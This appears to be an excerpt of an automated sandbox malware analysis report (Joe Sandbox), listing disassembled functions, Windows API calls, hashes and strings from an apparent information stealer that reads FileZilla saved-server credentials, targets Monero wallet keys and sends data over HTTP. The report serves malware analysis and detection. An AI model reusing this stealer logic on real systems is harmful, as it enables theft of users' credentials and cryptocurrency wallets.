                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31e425bdebfaecf87acffe3c576b1994a1a6b3d94d2d30e3b8b562e8ae5bab4e
                                  • Instruction ID: 0b6d2f36d5581be543e2ba18cb242ae6c38a208619174d0f08c95253fe4d7bd8
                                  • Opcode Fuzzy Hash: 31e425bdebfaecf87acffe3c576b1994a1a6b3d94d2d30e3b8b562e8ae5bab4e
                                  • Instruction Fuzzy Hash: C131D2B25086109FD744AE2CE8C177AB7E9EF48320F06493EEBC5C3784D63458518B97
                                  Function 00B9C079 Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fddcbebb393760b1a397a93975997411e60e32fae10d4b772e1ef0e86480022
                                  • Instruction ID: 36460147137586359e8edf2868496284addef55d4d929127956be643614d08de
                                  • Opcode Fuzzy Hash: 2fddcbebb393760b1a397a93975997411e60e32fae10d4b772e1ef0e86480022
                                  • Instruction Fuzzy Hash: 211123B361C708CBDB4CBA299CE163ABADED798350E20C17EA68343749FE7005449296
                                  Function 006F75A8 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Function 006C9AA0 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 006C03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,006D0DBF,006D0DBE,006D0DBB,006D0DBA), ref: 006C04C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C04C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 006C04E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C04F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 006C052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 006C0579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C0587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006C05C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C05D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C0662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C0692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C06AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006C06C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 006C06D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 006C06E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C06F3
                                  • lstrcat.KERNEL32(?,006D1770), ref: 006C0702
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C0715
                                  • lstrcat.KERNEL32(?,006D1774), ref: 006C0724
                                  • lstrcat.KERNEL32(?,login: ), ref: 006C0733
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C0746
                                  • lstrcat.KERNEL32(?,006D1780), ref: 006C0755
                                  • lstrcat.KERNEL32(?,password: ), ref: 006C0764
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C0777
                                  • lstrcat.KERNEL32(?,006D1790), ref: 006C0786
                                  • lstrcat.KERNEL32(?,006D1794), ref: 006C0795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C07EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 58f59a5ee90e3d56b71a5bb32b662e8aae32c4b2bd3132546620a26b5faee409
                                  • Instruction ID: 11ac7fa6389000cb14742f518918706c407257ac2303b30072d15bda3adc41d3
                                  • Opcode Fuzzy Hash: 58f59a5ee90e3d56b71a5bb32b662e8aae32c4b2bd3132546620a26b5faee409
                                  • Instruction Fuzzy Hash: C0D11A71D14208ABDB44EBE0DD96FFEB33AEF14304F50855DF112A61A1EE70AA44CB69
                                  Function 006B59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006B5A48
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B5A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B5BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0147EAA8,00000000,?,0147A330,00000000,?,006D1B4C), ref: 006B5EC1
                                  • lstrlen.KERNEL32(00000000), ref: 006B5ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006B5EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B5EEA
                                  • lstrlen.KERNEL32(00000000), ref: 006B5EFF
                                  • lstrlen.KERNEL32(00000000), ref: 006B5F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006B5F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 006B5F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006B5F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 006B5F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6000
                                  • InternetCloseHandle.WININET(00000000), ref: 006B600D
                                  • HttpOpenRequestA.WININET(00000000,0147EAC8,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B5C48
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 76002406a03d2e1135e8029b1ade762ff41c781079b071caf58e7a68961f97e5
                                  • Instruction ID: 8784f656959d616e85a67ef5830dd1e841b1a2ae96740d2c71087e0e386809f1
                                  • Opcode Fuzzy Hash: 76002406a03d2e1135e8029b1ade762ff41c781079b071caf58e7a68961f97e5
                                  • Instruction Fuzzy Hash: 1912A472920118ABCB55EBE0DCA6FFEB37AEF14704F00459DB10666191EF706E48CB69
                                  Function 006BCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BD083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006BD1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006BD1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD308
                                  • lstrcat.KERNEL32(?,006D1570), ref: 006BD317
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD32A
                                  • lstrcat.KERNEL32(?,006D1574), ref: 006BD339
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD34C
                                  • lstrcat.KERNEL32(?,006D1578), ref: 006BD35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD36E
                                  • lstrcat.KERNEL32(?,006D157C), ref: 006BD37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD390
                                  • lstrcat.KERNEL32(?,006D1580), ref: 006BD39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD3B2
                                  • lstrcat.KERNEL32(?,006D1584), ref: 006BD3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 006BD3D4
                                  • lstrcat.KERNEL32(?,006D1588), ref: 006BD3E3
                                    • Part of subcall function 006CAB30: lstrlen.KERNEL32(006B4F55,?,?,006B4F55,006D0DDF), ref: 006CAB3B
                                    • Part of subcall function 006CAB30: lstrcpy.KERNEL32(006D0DDF,00000000), ref: 006CAB95
                                  • lstrlen.KERNEL32(?), ref: 006BD42A
                                  • lstrlen.KERNEL32(?), ref: 006BD439
                                    • Part of subcall function 006CAD80: StrCmpCA.SHLWAPI(00000000,006D1568,006BD2A2,006D1568,00000000), ref: 006CAD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BD4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: ccc31a01e1b68359da6d8fcc526229d989c0e634e6d08d52f74c1b12976ec929
                                  • Instruction ID: 3b12eb4b2c035e85998e3fdcb005348e495a60a0b1f6de7f7ccbbdd188bd0c71
                                  • Opcode Fuzzy Hash: ccc31a01e1b68359da6d8fcc526229d989c0e634e6d08d52f74c1b12976ec929
                                  • Instruction Fuzzy Hash: 7CE11A71924108ABCB44EBE0DD96EFEB33AEF14305F10455DF207661A1DE31AE48DB6A
                                  Function 006BCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0147D1D0,00000000,?,006D1544,00000000,?,?), ref: 006BCB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006BCB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 006BCB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006BCBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 006BCBD9
                                  • StrStrA.SHLWAPI(?,0147D278,006D0B56), ref: 006BCBF7
                                  • StrStrA.SHLWAPI(00000000,0147D290), ref: 006BCC1E
                                  • StrStrA.SHLWAPI(?,0147DBC0,00000000,?,006D1550,00000000,?,00000000,00000000,?,01479228,00000000,?,006D154C,00000000,?), ref: 006BCDA2
                                  • StrStrA.SHLWAPI(00000000,0147DCA0), ref: 006BCDB9
                                    • Part of subcall function 006BC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006BC971
                                    • Part of subcall function 006BC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006BC97C
                                  • StrStrA.SHLWAPI(?,0147DCA0,00000000,?,006D1554,00000000,?,00000000,01479188), ref: 006BCE5A
                                  • StrStrA.SHLWAPI(00000000,01478F28), ref: 006BCE71
                                    • Part of subcall function 006BC920: lstrcat.KERNEL32(?,006D0B47), ref: 006BCA43
                                    • Part of subcall function 006BC920: lstrcat.KERNEL32(?,006D0B4B), ref: 006BCA57
                                    • Part of subcall function 006BC920: lstrcat.KERNEL32(?,006D0B4E), ref: 006BCA78
                                  • lstrlen.KERNEL32(00000000), ref: 006BCF44
                                  • CloseHandle.KERNEL32(00000000), ref: 006BCF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
